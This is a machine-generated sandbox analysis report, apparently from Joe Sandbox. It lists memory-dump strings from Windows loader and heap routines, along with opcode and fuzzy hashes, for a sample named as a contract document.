                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01761028
                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0176106B
                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017610AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                        • API String ID: 0-1468400865
                                                                                                                        Strings
                                                                                                                        • apphelp.dll, xrefs: 01722462
                                                                                                                        • LdrpDynamicShimModule, xrefs: 0176A998
                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0176A992
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0176A9A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-176724104
                                                                                                                        Strings
                                                                                                                        • HEAP[%wZ]: , xrefs: 01713255
                                                                                                                        • HEAP: , xrefs: 01713264
                                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0171327D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $@
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                        Strings
                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0176A10F
                                                                                                                        • LdrpCheckModule, xrefs: 0176A117
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0176A121
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                        Strings
                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 017782D7
                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 017782DE
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017782E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                        Strings
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017BC1C5
                                                                                                                        • @, xrefs: 017BC1F1
                                                                                                                        • PreferredUILanguages, xrefs: 017BC212
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01784899
                                                                                                                        • LdrpCheckRedirection, xrefs: 0178488F
                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01784888
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                        Strings
                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 017820F3
                                                                                                                        • LdrpInitializationFailure, xrefs: 017820FA
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01782104
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: #%u
                                                                                                                        Strings
                                                                                                                        • LdrResSearchResource Enter, xrefs: 0170AA13
                                                                                                                        • LdrResSearchResource Exit, xrefs: 0170AA25
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                        • API String ID: 0-4066393604
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: `$`
                                                                                                                        • API String ID: 0-197956300
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$MUI
                                                                                                                        • API String ID: 0-17815947
                                                                                                                        Strings
                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0170063D
                                                                                                                        • kLsE, xrefs: 01700540
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                        • API String ID: 0-2547482624
                                                                                                                        Strings
                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0170A309
                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0170A2FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                        • API String ID: 0-2876891731
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: MUI
                                                                                                                        • API String ID: 0-1339004836
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: GlobalTags
                                                                                                                        • API String ID: 0-1106856819
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .mui
                                                                                                                        • API String ID: 0-1199573805
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: EXT-
                                                                                                                        • API String ID: 0-1948896318
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BinaryHash
                                                                                                                        • API String ID: 0-2202222882
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #
                                                                                                                        • API String ID: 0-1885708031
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BinaryName
                                                                                                                        • API String ID: 0-215506332
                                                                                                                        Strings
                                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0178895E
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                        • API String ID: 0-702105204
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
                                                                                                                        • Instruction ID: 79448f5816294219697b69841b918cb784c6e396efe1e44da65b6157c2cda653
                                                                                                                        • Opcode Fuzzy Hash: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
                                                                                                                        • Instruction Fuzzy Hash: FCB16370A002698BDB74DF58CC94BA9B7B2EF44700F0485EDD64AE7241EB70DD86CB24
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f6619ec4451b16bfca7b0521fd5e350748082154803c41f0eb4b9f02a54d78f2
                                                                                                                        • Instruction ID: 863c431918a10173fea06476720cdd5a5a6668c3fec9a9ece72df1565accfc36
                                                                                                                        • Opcode Fuzzy Hash: f6619ec4451b16bfca7b0521fd5e350748082154803c41f0eb4b9f02a54d78f2
                                                                                                                        • Instruction Fuzzy Hash: E5A13531E00625AFEB32DB68D858FAEFBB8FB01714F050165EE01AB285DB749D41CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                        • Instruction ID: e4aad7cec1895816675f879136637580fb6542a4a9d733707840129f437ab6e1
                                                                                                                        • Opcode Fuzzy Hash: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                        • Instruction Fuzzy Hash: DCA1BE70B016169BDB25DF69C994BAAF7B1FF44328F104129EB05DB282EB34E811CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                        • Instruction ID: 2cfce50a58875c26c12542da79ee6daa0e329486426f89f546c805d041220019
                                                                                                                        • Opcode Fuzzy Hash: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                        • Instruction Fuzzy Hash: EAA1C972A04206AFC722DF18C984B2AFBF9FF48754F150928F58A9BA55D330E900CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                        • Instruction ID: e3b1cb26fd8c096fad9c0a6de513ec7bf87c6c951d302c831bbe95e8873edc43
                                                                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                        • Instruction Fuzzy Hash: C2B11971E0061ADFDF29CFA9C880AADFBB5FF48310F148169E915A7356D730A946CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                        • Instruction ID: 34fb5bc67ca829b6c11cf9d842d8f3aa4bd63934d1f28368715dc865de743e84
                                                                                                                        • Opcode Fuzzy Hash: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                        • Instruction Fuzzy Hash: B391C071D40216BFDB15EFA8D884BAEFFB5AB48710F1541A9F610EB345D734E9009BA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 018a3655b4190f7b39df29b27a14c96bd2e28a6bfd987a02124f5eb4d1c24c06
                                                                                                                        • Instruction ID: fb26a004178b57e28be7254e8682c7229cada47b4c49f88caac38235423c3832
                                                                                                                        • Opcode Fuzzy Hash: 018a3655b4190f7b39df29b27a14c96bd2e28a6bfd987a02124f5eb4d1c24c06
                                                                                                                        • Instruction Fuzzy Hash: 08913471A00212CFEB26DB6CC884B7EFBB5EF94714F2580A9EE059B349EA34D941C751
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                        • Instruction ID: ee77cf0acf567c60df56e83df41f5b695e3bf0619db1d25552435c864c92ab28
                                                                                                                        • Opcode Fuzzy Hash: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                        • Instruction Fuzzy Hash: 2281A271E006169BDB68CF69C940ABEFBF9FB48700F54852EE845E7640E774E940CBA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                        • Instruction ID: 50559d20320d53766b0e260b6ad0a59367743853dbe85830a25623bde41758d4
                                                                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                        • Instruction Fuzzy Hash: 6C819231A0020A9FDF19CF98C894AAEFBB2FF84711F14856DD9169B349EB74E941CB40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                        • Instruction ID: e5a1e8641521cbd73c05cd82ab2836c37dd5263f05139c3958f1ab554f4258fc
                                                                                                                        • Opcode Fuzzy Hash: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                        • Instruction Fuzzy Hash: 9A814F71A01609AFDB26CFA9C880BEEFBB9FF88354F144429E555A7251DB30AC45CB60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ed46a224f1015df1828c700d1400afc86f35b3daa40f28f944062b65074e518
                                                                                                                        • Instruction ID: c16b63643c7e9bdf6f5bd09e36b8e12c42c96dc2d13b5ae72b030ea3cb44e71e
                                                                                                                        • Opcode Fuzzy Hash: 1ed46a224f1015df1828c700d1400afc86f35b3daa40f28f944062b65074e518
                                                                                                                        • Instruction Fuzzy Hash: E871ACB5D04629DBCB26CF98D9907BEFBB4FF68710F14815AE942AB354D3709840CBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
                                                                                                                        • Instruction ID: 9cabe81d5136d850519b89ed0125765eb21bec7d6aa6ec44821e65d6f155ece7
                                                                                                                        • Opcode Fuzzy Hash: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
                                                                                                                        • Instruction Fuzzy Hash: 44714F70900205EFDB20DF69D984B9BFBF9FF94710B10815EF616AB29AD7319A80CB54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                        • Instruction ID: 99d1bedf9b3c4163c0eeb06cf2159b00ecc631b9ca2105e5542decf5b76baff8
                                                                                                                        • Opcode Fuzzy Hash: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                        • Instruction Fuzzy Hash: B371CF316042428FD312DF2CC484B6AF7E5FF84710F1489AAE899CB79ADB34D946CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                        • Instruction ID: bd5cfff25251d3f4a39021122cf67e17fad37dda0e4090d1e5600d1f5578f8ba
                                                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                        • Instruction Fuzzy Hash: F5716E71E40619AFDB10EFA9C944E9EFBB9FF48710F104569E505A7254DB30EA05CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                        • Instruction ID: 91a919ff98ec1fe4ea28c9ea15694e488174c5ed2179689065058b64215f3de2
                                                                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
